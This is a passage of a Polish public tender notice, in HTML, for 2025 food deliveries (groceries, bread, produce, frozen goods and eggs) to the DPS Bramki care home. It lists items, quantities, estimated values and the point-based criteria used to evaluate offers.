odrzuceniu.<br/>Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny lub kosztu i innych kryteriów oceny ofert, zamawiający zastosuje reguły wynikające z art. 248 p.z.p.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Częstotliwosć dostaw (T)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wymiana asortymentu w dniu dostawy (R)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa artykułów żywnościowych – różnych artykułów spożywczych dla DPS Bramki w roku 2025”.<br/>Lp	Podane w treści nazwy pochodzenia art. nie są bezwzględnie obowiązujące, dopuszcza się art. równoważne jakością lub lepsze	Jm.	Ilość	Cena jednostkowa brutto	Wartość brutto<br/>1	Ananasy w puszce 565g	szt.	32 <br/>2	Aromaty 9 ml	szt.	53 <br/>3	Barszcz biały 1000g	szt.	10 <br/>4	Barszcz biały zakwas 500ml	szt.	50 <br/>5	Bazylia 100g	szt.	15 <br/>6	Brzoskwinie 820g	szt.	16 <br/>7	Budyń bez cukru 60g	szt.	1577 <br/>8	Chrzan 900g	szt.	20 <br/>9	Cukier 1kg	kg.	2533 <br/>10	Cukier puder 0,5kg	szt.	13 <br/>11	Cukier waniliowy 32g	szt.	360 <br/>12	Cynamon 20g	szt.	120 <br/>13	Czosnek granulowany 1000g	szt.	20 <br/>14	Dżem niskosłodzony 270g	szt.	2213 <br/>15	Fasola czerwona konserwowa 400g	szt.	40 <br/>16	Fasola sucha Jaś 500g	szt.	280 <br/>17	Galaretka owocowa z cukrem 90g	szt.	533 <br/>18	Gałka muszkatołowa 20g	szt.	27 <br/>19	Groszek konserwowy 400g	szt.	480 <br/>20	Herbata granulowana 100g	kg.	333 <br/>21	Imbir 15g	szt.	10 <br/>22	Kakao 100g	szt.	533 <br/>23	Kasza gryczana 1kg	kg.	33 <br/>24	Kasza jęczmienna 1kg	kg.	140 <br/>25	Kasza manna 1kg	kg.	167 <br/>26	Kasza pęczak 1kg	kg.	20 <br/>27	Kawa inka 250g	szt.	43 <br/>28	Kawa zbożowa 500g	szt.	83 <br/>29	Ketchup 500g min. 35% wkł. koncentr.	szt.	128 <br/>30	Kisiel bez cukru 77g	szt.	1281 <br/>31	Koncentrat pomidorowy 900g	szt.	459 <br/>32	Kukurydza konserwowa 400g	szt.	400 <br/>33	Kurkuma 100g	szt.	5 <br/>34	Kwasek cytrynowy 50g	szt.	20 <br/>35	Liście laurowe 100g	szt.	40 <br/>36	Majeranek 100g	szt.	50 <br/>37	Majonez 420g	szt.	580 <br/>38	Makaron krajanka gruba	kg.	113 <br/>39	Makaron lasagne	kg.	9 <br/>40	Makaron muszelki 1kg	kg.	73 <br/>41	Makaron nitki 500g	kg.	116 <br/>42	Makaron rurki 1kg	kg.	60 <br/>43	Makaron spagetti 500g	kg.	227 <br/>44	Makaron świderki 1kg	kg.	380 <br/>45	Masa makowa w puszce 1kg	szt.	40 <br/>46	Mąka pszenna typ 480 1kg	kg.	987 <br/>47	Mąka ziemniaczana 1kg	kg.	27 <br/>48	Mieszanka bakaliowa 1 kg	kg.	5 <br/>49	Miód naturalny 1l	szt.	16 <br/>50	Musli owocowe 1kg	kg.	133 <br/>51	Musztarda 200g	szt.	280 <br/>52	Ocet 0,5l	szt.	60 <br/>53	Ogórki konserwowe 870g	szt.	256 <br/>54	Olej 1l	szt.	656 <br/>55	Oregano 100g	szt.	10 <br/>56	Papryka konserwowa 870g	szt.	11 <br/>57	Papryka mielona ostra 1000g	szt.	3 <br/>58	Papryka mielona słodka 1000g	szt.	5 <br/>59	Papryka wędzona 1000g	szt.	5 <br/>60	Pieprz czarny ziarnisty1000g	szt.	20 <br/>61	Pieprz ziołowy 100g	szt.	15 <br/>62	Płatki jęczmienne	kg.	80 <br/>63	Płatki kukurydzane kg.	189 <br/>64	Płatki owsiane 1kg	kg.	80 <br/>65	Płatki żytnie	kg.	108 <br/>66	Pomidor krojony kostka w puszce 2500ml	szt.	40 <br/>67	Proszek do pieczenia 36g	szt.	140 <br/>68	Przyprawa Curry	szt.	50 <br/>69	Przyprawa do drobiu 1000g	szt.	5 <br/>70	Przyprawa do gyrosa 1000g	szt.	2 <br/>71	Przyprawa do karkówki 1000g	szt.	5 <br/>72	Przyprawa do pizzy 1000g	szt.	3 <br/>73	Przyprawa do ryb 1000g	szt.	3 <br/>74	Przyprawa w płynie typu magi 1L	szt.	17 <br/>75	Rodzynki 200g	szt.	133 <br/>76	Ryż 1kg	kg.	453 <br/>77	Sałatka szwedzka 850g	szt.	40 <br/>78	Soda oczyszczona 80g	szt.	27 <br/>79	Sos grzybowy	szt.	133 <br/>80	Sos pieczarkowy	szt.	67 <br/>81	Sos pieczeniowy ciemny	szt.	113 <br/>82	Sól 1kg	kg.	400 <br/>83	Susz warzywny 1 kg	szt. 20 <br/>84	Szczawa konserwowy 900g	szt.	140 <br/>85	Śliwki suszone 100g	kg.	4 <br/>86	Tymianek 100g	szt.	10 <br/>87	Vegetta 1000g (lub równoważne)	szt.	145 <br/>88	Wiórki kokosowe	szt.	13 <br/>89	Ziele angielskie 1000g	szt.	10 <br/>90	Zioła prowansalskie 100g	szt.	20 <br/>91	Zupa grzybowa 37g	szt.	687 <br/>92	Zupa ogonowa 62g	szt.	867 <br/>93	Zupa pieczarkowa 44g	szt.	587 <br/>94	Żelatyna 50g	szt.	253 <br/>95	Żurawina suszona 500g	szt.	5 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 92378,81 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty Zamawiający będzie się kierował następującym/i kryterium/ami.<br/><br/><br/>l.p.	<br/>Kryterium	Znaczenie<br/>procentowe<br/>kryterium	Maksymalna ilość punktów jakie może otrzymać oferta<br/>za dane kryterium<br/>1) Cena ( C ) 60 % 60 punktów<br/>2) Częstotliwość dostaw (T) 30 % 30 punktów<br/>3) Wymiana asortymentu w dniu dostawy (R) 10 % 10 punktów<br/><br/>2. Zasady oceny kryterium &#34;Cena&#34; (C).<br/>Przyznane pkt C =	cena (brutto) najniższa x 60 pkt<br/> cena (brutto) badanej oferty<br/><br/>3.Zasady oceny kryterium „Częstoliwość dostaw” (T).<br/>Ocena będzie dokonywana poprzez porównanie zaoferowanej częstotliwości dostaw zawartych w formularzu oferty:<br/>- dostawy codziennie (dni robocze) w godz. 8:00 – 11:00 - 30 pkt.<br/>- dostawy codziennie (dni robocze) w godz. 11:30 – 14:30 - 25 pkt.<br/>- dostawy 3 razy w tygodniu (dni robocze) w godz.	8:00 – 11:00 - 15 pkt.<br/>- dostawy 3 razy w tygodniu (dni robocze) w godz.	11:30 – 14:30 - 10 pkt.<br/>- dostawy 2 razy w tygodniu (dni robocze) w godz.	8:00 – 11:00 - 5 pkt.<br/>- dostawy 2 razy w tygodniu (dni robocze) w godz.	11:30 – 14:30 - 1 pkt.<br/><br/>4. Zasady oceny kryterium „Wymiana asortymentu w dniu dostawy” (R).<br/>Wymiana reklamowanego asortymentu w dniu dostawy – oferta, w której Wykonawca zaoferuje wymianę reklamowanego asortymentu w dniu jego dostawy (nie później niż do godz. 14:30) otrzyma 10 punktów. Wykonawca, który nie zaoferuje wymiany reklamowanego asortymentu w dniu dostawy otrzyma 0 punków.<br/>Liczba .punktów określona zostanie na podstawie poniższego wzoru:<br/> C+T+R<br/>Końcowy wynik powyższego działania zostanie zaokrąglony do dwóch miejsc po przecinku.<br/><br/>Za najkorzystniejszą zostanie wybrana oferta, która zgodnie z powyższymi kryteriami oceny ofert uzyska najwyższą liczbę punktów spośród ofert nie podlegających odrzuceniu.<br/>Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny lub kosztu i innych kryteriów oceny ofert, zamawiający zastosuje reguły wynikające z art. 248 p.z.p.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Częstotliwosć dostaw (T)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wymiana asortymentu w dniu dostawy (R)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa artykułów żywnościowych – pieczywa dla DPS Bramki w roku 2025”.<br/>Lp	Podane w treści nazwy pochodzenia art. nie są bezwzględnie obowiązujące, dopuszcza się art. równoważne jakością lub lepsze	Jm.	Ilość	Cena jednostkowa brutto	Wartość brutto<br/>1	Bułka paryska 450g	szt.	15000 <br/>2	Bułka kajzerka 50g	szt.	300 <br/>3	Bułka słodka 100g	szt.	600 <br/>4	Chleb pszenno-żytni 500g	szt.	8600 <br/>5	Chleb razowy 500g	szt.	4300 <br/>6.	Chleb wieloziarnisty 500g	szt.	1500 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 74131,20 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15810000-9 - Pieczywo, świeże wyroby piekarskie i ciastkarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty Zamawiający będzie się kierował następującym/i kryterium/ami.<br/><br/><br/>l.p.	<br/>Kryterium	Znaczenie<br/>procentowe<br/>kryterium	Maksymalna ilość punktów jakie może otrzymać oferta<br/>za dane kryterium<br/>1) Cena ( C ) 60 % 60 punktów<br/>2) Częstotliwość dostaw (T) 30 % 30 punktów<br/>3) Wymiana asortymentu w dniu dostawy (R) 10 % 10 punktów<br/><br/>2. Zasady oceny kryterium &#34;Cena&#34; (C).<br/>Przyznane pkt C =	cena (brutto) najniższa x 60 pkt<br/> cena (brutto) badanej oferty<br/><br/>3.Zasady oceny kryterium „Częstoliwość dostaw” (T).<br/>Ocena będzie dokonywana poprzez porównanie zaoferowanej częstotliwości dostaw zawartych w formularzu oferty:<br/>- dostawy codziennie (dni robocze) w godz. 8:00 – 11:00 - 30 pkt.<br/>- dostawy codziennie (dni robocze) w godz. 11:30 – 14:30 - 25 pkt.<br/>- dostawy 3 razy w tygodniu (dni robocze) w godz.	8:00 – 11:00 - 15 pkt.<br/>- dostawy 3 razy w tygodniu (dni robocze) w godz.	11:30 – 14:30 - 10 pkt.<br/>- dostawy 2 razy w tygodniu (dni robocze) w godz.	8:00 – 11:00 - 5 pkt.<br/>- dostawy 2 razy w tygodniu (dni robocze) w godz.	11:30 – 14:30 - 1 pkt.<br/><br/>4. Zasady oceny kryterium „Wymiana asortymentu w dniu dostawy” (R).<br/>Wymiana reklamowanego asortymentu w dniu dostawy – oferta, w której Wykonawca zaoferuje wymianę reklamowanego asortymentu w dniu jego dostawy (nie później niż do godz. 14:30) otrzyma 10 punktów. Wykonawca, który nie zaoferuje wymiany reklamowanego asortymentu w dniu dostawy otrzyma 0 punków.<br/>Liczba .punktów określona zostanie na podstawie poniższego wzoru:<br/> C+T+R<br/>Końcowy wynik powyższego działania zostanie zaokrąglony do dwóch miejsc po przecinku.<br/><br/>Za najkorzystniejszą zostanie wybrana oferta, która zgodnie z powyższymi kryteriami oceny ofert uzyska najwyższą liczbę punktów spośród ofert nie podlegających odrzuceniu.<br/>Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny lub kosztu i innych kryteriów oceny ofert, zamawiający zastosuje reguły wynikające z art. 248 p.z.p.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Częstotliwosć dostaw (T)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wymiana asortymentu w dniu dostawy (R)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> „Dostawa artykułów żywnościowych warzyw i owoców dla DPS Bramki w roku 2025”.<br/>Lp	Podane w treści nazwy pochodzenia art. nie są bezwzględnie obowiązujące, dopuszcza się art. równoważne jakością lub lepsze	Jm.	Ilość	Cena jednostkowa brutto	Wartość brutto<br/>1	Arbuz kg	150 <br/>2	Banany	kg.	650 <br/>3	Botwina	pęczek	60 <br/>4	Brokuły	kg	30 <br/>5	Brzoskwinia świeża	kg	50 <br/>6	Buraki czerwone	kg	600 <br/>7	Cebula (średnica minimum 6 cm)	kg	450 <br/>8	Cukinia	kg	100 <br/>9	Cytryny	kg.	350 <br/>10	Czosnek główki	główki	350 <br/>11	Fasola szparagowa	kg	100 <br/>12	Gruszki	kg	1100 <br/>13	Jabłka	kg	4400 <br/>14	Kalafior	kg	30 <br/>15	Kapusta biała	kg	500 <br/>16	Kapusta czerwona	kg	300 <br/>17	Kapusta kiszona	kg	450 <br/>18	Kapusta młoda	kg	100 <br/>19	Kapusta pekińska	kg	500 <br/>20	Kapusta włoska	kg	50 <br/>21	Koper	pęczek	1300 <br/>22	Mandarynka świeża	kg	200 <br/>23	Marchew	kg	500 <br/>24	Natka pietruszki	pęczek	1300 <br/>25	Nektarynka świeża	kg	50 <br/>26	Ogórki kiszone	kg	400 <br/>27	Ogórki świeże	kg	1350 <br/>28	Papryka świeża	kg	100 <br/>29	Pieczarki	kg	150 <br/>30	Pietruszka korzeń	kg	300 <br/>31	Pomidor (okrągły, nie przemysłowy)	kg	1500 <br/>32	Por	kg	150 <br/>33	Rabarbar	kg	60 <br/>34	Rzodkiewka	pęczek	1800 <br/>35	Sałata lodowa	szt.	80 <br/>36	Sałata masłowa	szt.	150 <br/>37	Seler	kg	200 <br/>38	Szczypior	pęczek	1300 <br/>39	Śliwka węgierka świeża	kg	150 <br/>40	Truskawki	kg	200 <br/>41	Wiśnie kg	40 <br/>42	Ziemniaki	kg	11000 <br/>43	Ziemniaki młode	kg	1500 <br/>44	Dynia	kg	200 <br/>45	Winogrono zielone	kg	200 <br/>46	Kalarepa	kg	200 <br/>47	Biała rzodkiew kg	200 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 114449,50 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03221200-8 - Warzywa owocowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty Zamawiający będzie się kierował następującym/i kryterium/ami.<br/><br/><br/>l.p.	<br/>Kryterium	Znaczenie<br/>procentowe<br/>kryterium	Maksymalna ilość punktów jakie może otrzymać oferta<br/>za dane kryterium<br/>1) Cena ( C ) 60 % 60 punktów<br/>2) Częstotliwość dostaw (T) 30 % 30 punktów<br/>3) Wymiana asortymentu w dniu dostawy (R) 10 % 10 punktów<br/><br/>2. Zasady oceny kryterium &#34;Cena&#34; (C).<br/>Przyznane pkt C =	cena (brutto) najniższa x 60 pkt<br/> cena (brutto) badanej oferty<br/><br/>3.Zasady oceny kryterium „Częstoliwość dostaw” (T).<br/>Ocena będzie dokonywana poprzez porównanie zaoferowanej częstotliwości dostaw zawartych w formularzu oferty:<br/>- dostawy codziennie (dni robocze) w godz. 8:00 – 11:00 - 30 pkt.<br/>- dostawy codziennie (dni robocze) w godz. 11:30 – 14:30 - 25 pkt.<br/>- dostawy 3 razy w tygodniu (dni robocze) w godz.	8:00 – 11:00 - 15 pkt.<br/>- dostawy 3 razy w tygodniu (dni robocze) w godz.	11:30 – 14:30 - 10 pkt.<br/>- dostawy 2 razy w tygodniu (dni robocze) w godz.	8:00 – 11:00 - 5 pkt.<br/>- dostawy 2 razy w tygodniu (dni robocze) w godz.	11:30 – 14:30 - 1 pkt.<br/><br/>4. Zasady oceny kryterium „Wymiana asortymentu w dniu dostawy” (R).<br/>Wymiana reklamowanego asortymentu w dniu dostawy – oferta, w której Wykonawca zaoferuje wymianę reklamowanego asortymentu w dniu jego dostawy (nie później niż do godz. 14:30) otrzyma 10 punktów. Wykonawca, który nie zaoferuje wymiany reklamowanego asortymentu w dniu dostawy otrzyma 0 punków.<br/>Liczba .punktów określona zostanie na podstawie poniższego wzoru:<br/> C+T+R<br/>Końcowy wynik powyższego działania zostanie zaokrąglony do dwóch miejsc po przecinku.<br/><br/>Za najkorzystniejszą zostanie wybrana oferta, która zgodnie z powyższymi kryteriami oceny ofert uzyska najwyższą liczbę punktów spośród ofert nie podlegających odrzuceniu.<br/>Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny lub kosztu i innych kryteriów oceny ofert, zamawiający zastosuje reguły wynikające z art. 248 p.z.p.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Częstotliwosć dostaw (T)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wymiana asortymentu w dniu dostawy (R)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> „Dostawa artykułów żywnościowych głęboko mrożonych dla DPS Bramki w roku 2025”.<br/>Lp	Podane w treści nazwy pochodzenia art. nie są bezwzględnie obowiązujące, dopuszcza się art. równoważne jakością lub lepsze	Jm.	Ilość	Cena jednostkowa brutto	Wartość brutto<br/>1	Brokuł mrożony 2,5 kg	szt.	350 <br/>2	Fasola szparagowa 2,5kg	szt.	350 <br/>3	Kalafior mrożony 2,5kg	szt.	300 <br/>4	Kwiatowy bukiet warzyw 2,5kg	szt.	800 <br/>5	Makrela w pomidorach 330g	szt.	300 <br/>6	Mieszanka kompotowa bez pestki 2,5kg	szt.	250 <br/>7	Panga biała filet mrożony b/sk	kg.	300 <br/>8	Paprykarz w puszce 300g	szt.	500 <br/>9	Płaty mrożone Dorsz Atlantycki kg.	100 <br/>10	Płaty mrożone Miruna	kg.	200 <br/>11	Podgrzybek mrożony kostka	kg.	50 <br/>12	Ryba wędzona	kg	130 <br/>13	Szpinak liść mrożony 2,5kg	szt.	50 <br/>14	Śledź płaty	kg.	40 <br/>15	Truskawka mrożona 10 kg	szt.	25 <br/>16	Tuńczyk w oleju 170g	szt.	100 <br/>17	Włoszczyzna mrożona słupki 2,5kg	szt.	300 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 57359,50 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15896000-5 - Produkty głęboko mrożone</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty Zamawiający będzie się kierował następującym/i kryterium/ami.<br/><br/><br/>l.p.	<br/>Kryterium	Znaczenie<br/>procentowe<br/>kryterium	Maksymalna ilość punktów jakie może otrzymać oferta<br/>za dane kryterium<br/>1) Cena ( C ) 60 % 60 punktów<br/>2) Częstotliwość dostaw (T) 30 % 30 punktów<br/>3) Wymiana asortymentu w dniu dostawy (R) 10 % 10 punktów<br/><br/>2. Zasady oceny kryterium &#34;Cena&#34; (C).<br/>Przyznane pkt C =	cena (brutto) najniższa x 60 pkt<br/> cena (brutto) badanej oferty<br/><br/>3.Zasady oceny kryterium „Częstoliwość dostaw” (T).<br/>Ocena będzie dokonywana poprzez porównanie zaoferowanej częstotliwości dostaw zawartych w formularzu oferty:<br/>- dostawy codziennie (dni robocze) w godz. 8:00 – 11:00 - 30 pkt.<br/>- dostawy codziennie (dni robocze) w godz. 11:30 – 14:30 - 25 pkt.<br/>- dostawy 3 razy w tygodniu (dni robocze) w godz.	8:00 – 11:00 - 15 pkt.<br/>- dostawy 3 razy w tygodniu (dni robocze) w godz.	11:30 – 14:30 - 10 pkt.<br/>- dostawy 2 razy w tygodniu (dni robocze) w godz.	8:00 – 11:00 - 5 pkt.<br/>- dostawy 2 razy w tygodniu (dni robocze) w godz.	11:30 – 14:30 - 1 pkt.<br/><br/>4. Zasady oceny kryterium „Wymiana asortymentu w dniu dostawy” (R).<br/>Wymiana reklamowanego asortymentu w dniu dostawy – oferta, w której Wykonawca zaoferuje wymianę reklamowanego asortymentu w dniu jego dostawy (nie później niż do godz. 14:30) otrzyma 10 punktów. Wykonawca, który nie zaoferuje wymiany reklamowanego asortymentu w dniu dostawy otrzyma 0 punków.<br/>Liczba .punktów określona zostanie na podstawie poniższego wzoru:<br/> C+T+R<br/>Końcowy wynik powyższego działania zostanie zaokrąglony do dwóch miejsc po przecinku.<br/><br/>Za najkorzystniejszą zostanie wybrana oferta, która zgodnie z powyższymi kryteriami oceny ofert uzyska najwyższą liczbę punktów spośród ofert nie podlegających odrzuceniu.<br/>Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny lub kosztu i innych kryteriów oceny ofert, zamawiający zastosuje reguły wynikające z art. 248 p.z.p.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Częstotliwosć dostaw (T)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wymiana asortymentu w dniu dostawy (R)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> „Dostawa artykułów żywnościowych jaj dla DPS Bramki w roku 2025”.<br/>Lp	Podane w treści nazwy pochodzenia art. nie są bezwzględnie obowiązujące, dopuszcza się art. równoważne jakością lub lepsze	Jm.	Ilość	Cena jednostkowa brutto	Wartość brutto<br/>1	Jaja (65-70g)	szt.	38000 </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 29260,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03142500-3 - Jaja</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 